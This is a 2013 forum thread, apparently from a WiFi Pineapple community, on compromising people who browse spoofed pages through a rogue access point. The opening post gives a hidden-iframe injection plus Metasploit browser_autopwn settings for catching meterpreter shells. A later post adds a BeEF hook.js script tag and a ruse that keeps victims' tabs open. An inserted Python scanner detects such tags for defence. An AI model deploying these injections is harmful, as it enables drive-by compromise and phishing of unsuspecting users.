skysploit (author), posted February 20, 2013:

So, here's a simple change that could pay out big (in a pinch) on a pentest...

How does it work?

It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell.

How to set it up.

1. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip".
2. Open msfconsole and "use auxiliary/server/browser_autopwn".
3. Set the options below (n00b's, let Google be your guide).
4. Turn on "DNS Spoof" from the main page of the Pineapple.
5. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits.

Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack.

Side note: Pentesting at Starbucks can get you put in jail... Happy (responsible) hacking!

~skysploit

iframe (add this to the end of the script):

    <iframe SRC="http://172.16.42.42:8080/hacked" height="0" width="0"/>

Settings for browser_autopwn:

    msf auxiliary(browser_autopwn) > show options

    Module options (auxiliary/server/browser_autopwn):

       Name        Current Setting  Required  Description
       ----        ---------------  --------  -----------
       LHOST       172.16.42.42     yes       The IP address to use for reverse-connect payloads
       SRVHOST     172.16.42.42     yes       The local host to listen on.
       SRVPORT     8080             yes       The local port to listen on.
       SSL         false            no        Negotiate SSL for incoming connections
       SSLCert                      no        Path to a custom SSL certificate
       SSLVersion  SSL3             no        Specify the version of SSL that should be used
       URIPATH     /hacked          no        The URI to use for this exploit (default is random)

    msf auxiliary(browser_autopwn) > exploit
    ....... (Server build process was pulled out) .......
    [*] --- Done, found 53 exploit modules
Mr-Protocol, posted February 20, 2013:

About time someone else thought of this ;) You could theoretically do the same with ettercap. But instead of autopwn, how about Rel1k's SET java payload? :D
skysploit (author), posted February 20, 2013:

That's a great idea! I will have to go back and play around with the java payload. :)
Foxtrot, posted February 20, 2013:

> That's a great idea! I will have to go back and play around with the java payload. :)

Keep posting man, this is great!

-Foxtrot
Zephyr, posted February 20, 2013:

> Side note: Pentesting at Starbucks can get you put in jail...

Not if you're using your Macbook Pro and wearing your rectangular, thick-framed spectacles while donning a latest-cause t-shirt ;)
inTheDMZ, posted February 20, 2013 (edited February 20, 2013 by inTheDMZ):

This method could also be used with BeEF, placing the hook.js script directly onto a fake webpage on the pineapple; the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking. Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

Inject this:

    <script language='Javascript' src="192.168.1.100/hook.js"></script>

where 192.168.1.100 is the IP address (local or remote) of the beEF server.
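The two injections described in this thread, the zero-size iframe in the first post and the remote hook.js script tag just above, are both easy to spot if you scan the HTML a captive portal or login page actually serves. The scanner below is an added example written for this page from the defender's side; it is not code from the thread, from the WiFi Pineapple, from Metasploit or from BeEF. It uses only the Python standard library, and the sample page, the allowlist and the finding labels are constructed for the example. It flags iframes that are hidden by size or style, and script or iframe references whose host is not on an allowlist, including scheme-less values of the form "host/path" that a browser would resolve relative to the page but that a pasted reference often takes.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: a plain login form with the two kinds of injected
# tags discussed in the thread appended at the bottom (values taken from the
# thread, not from a real site).
SAMPLE_HTML = """
<html><body>
<form action="/login" method="post"><input name="user"><input name="pass"></form>
<script src="/static/app.js"></script>
<iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/>
<script language='Javascript' src="192.168.1.100/hook.js"></script>
</body></html>
"""

# Matches plain pixel sizes such as 0, 1, 0px; percentages are left alone.
_SIZE = re.compile(r"^\s*(\d+(?:\.\d+)?)\s*(px)?\s*$", re.I)


def _is_zero_size(value):
    """True for width/height values of one pixel or less (effectively hidden)."""
    if value is None:
        return False
    m = _SIZE.match(value)
    return bool(m) and float(m.group(1)) <= 1.0


def _reference_host(src):
    """Host an src attribute refers to, or '' for a same-origin path.

    Absolute URLs give their hostname. A scheme-less value whose first path
    segment is dotted and is followed by more path ("192.168.1.100/hook.js")
    is reported as that host: browsers treat it as a relative path, but it is
    the shape a pasted external reference usually has, so it is not trusted.
    """
    parts = urlsplit(src.strip())
    if parts.netloc:
        return (parts.hostname or "").lower()
    path = parts.path
    if path.startswith("/") or "/" not in path:
        return ""
    first = path.split("/", 1)[0]
    if "." in first:
        return first.split(":")[0].lower()
    return ""


class InjectedTagScanner(HTMLParser):
    """Collects hidden iframes and externally sourced scripts/iframes."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []  # list of (reason, src) tuples

    def _host_allowed(self, src):
        host = _reference_host(src)
        return host == "" or host in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases attribute names; normalise anyway.
        a = {k.lower(): v for k, v in attrs}
        if tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (_is_zero_size(a.get("width"))
                      or _is_zero_size(a.get("height"))
                      or "display:none" in style
                      or "visibility:hidden" in style)
            if hidden:
                self.findings.append(("hidden_iframe", src))
            elif not self._host_allowed(src):
                self.findings.append(("external_iframe", src))
        elif tag == "script":
            src = a.get("src")
            if src and not self._host_allowed(src):
                self.findings.append(("external_script", src))


def scan_html(html, allowed_hosts=()):
    """Return the list of (reason, src) findings for one HTML document."""
    scanner = InjectedTagScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for reason, src in scan_html(SAMPLE_HTML, allowed_hosts=("www.example.com",)):
        print(f"{reason}: {src}")
```

Run against the constructed page it reports the zero-size iframe pointing at 172.16.42.42:8080 and the script loaded from 192.168.1.100; the same-origin /static/app.js is not reported. In practice you would feed it the HTML captured from the network (or the files served by the portal) and compare the findings against the hosts the page is expected to reference.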
Foxtrot, posted February 20, 2013 (edited February 20, 2013 by Foxtrot):

> This method could also be used with BeEF, placing the hook.js script directly onto a fake webpage on the pineapple; the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking. Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

Could work, some sites ask you to keep another window/tab open while a download finishes, etc... Maybe a module should be created.

-Foxtrot

EDIT: Has anyone got part or all of the BeEF to run on the Pineapple? Never looked into it..
inTheDMZ, posted February 20, 2013:

I've run BeEF on a minimal VPS before, and it was a bit slow. I guess it could work on the Pineapple but it would take up resources, see what you can do!
Foxtrot, posted February 20, 2013:

> I've run BeEF on a minimal VPS before, and it was a bit slow. I guess it could work on the Pineapple but it would take up resources, see what you can do!

Aye! I'll prepare a USB :)

-Foxtrot
crepsidro, posted February 20, 2013:

Wait... Pineapple's firmware includes metasploit framework? Get outta town!
Foxtrot, posted February 20, 2013:

> Wait... Pineapple's firmware includes metasploit framework? Get outta town!

uh.. does it?

-Foxtrot
Mr-Protocol, posted February 20, 2013:

> uh.. does it?
>
> -Foxtrot

Pretty sure no. Too many dependencies and it is a resource hog.
Foxtrot, posted February 20, 2013:

> Pretty sure no. Too many dependencies and it is a resource hog.

Ah, thought so lol

-Foxtrot
skysploit (author), posted February 20, 2013:

> Wait... Pineapple's firmware includes metasploit framework? Get outta town!

crepsidro, I have not personally tried to run msf on the pineapple. I don't think it has the "juice" to support it.

Here's a little more info on preparing for the autopwn attack. There are multiple ways to do this; below is the way I typically set up my connections.

1. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network.
2. Using Backtrack running in a VM, connect both the wireless card and the ethernet port to the VM (yes, I pull both resources from the hosting machine to the VM).
3. Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42); set the wifi adapter to the network's gateway address.
4. Open Metasploit using "msfconsole" or "msfcli" (again, use Google as a reference to help set the parameters above).

Hope this helps.

~skysploit
crepsidro, posted February 21, 2013:

Yes, sorry, I figured it out - been stupid. I thought at some point you were talking about a standalone metasploit implementation. If I have my laptop I don't need a pineapple - a wifi adapter works as fine.
skysploit (author), posted February 22, 2013:

> Yes, sorry, I figured it out - been stupid. I thought at some point you were talking about a standalone metasploit implementation. If I have my laptop I don't need a pineapple - a wifi adapter works as fine.

Well who's to say that you can't set up a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.
Mr-Protocol, posted February 22, 2013:

> Well who's to say that you can't set up a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.

The first half of this was an idea I had a year or so ago :P It's a good one too.
barry99705, posted February 26, 2013 (edited February 26, 2013 by barry99705):

> Pretty sure no. Too many dependencies and it is a resource hog.

Heh, should try running metasploit on a pda! I've done it, once. It was painful, but it worked. Not my device, but that's what I had.

[image]

​ <<----- Why is this getting added after every image?
Mr-Protocol, posted February 26, 2013:

That had to be painful and have a good deal of storage. It looks like the same characters used for yahoo to parse their packets. How are you attaching the image?
barry99705, posted February 27, 2013:

> That had to be painful and have a good deal of storage. It looks like the same characters used for yahoo to parse their packets. How are you attaching the image?

The image icon above the post box. It also added one when I added an emoticon.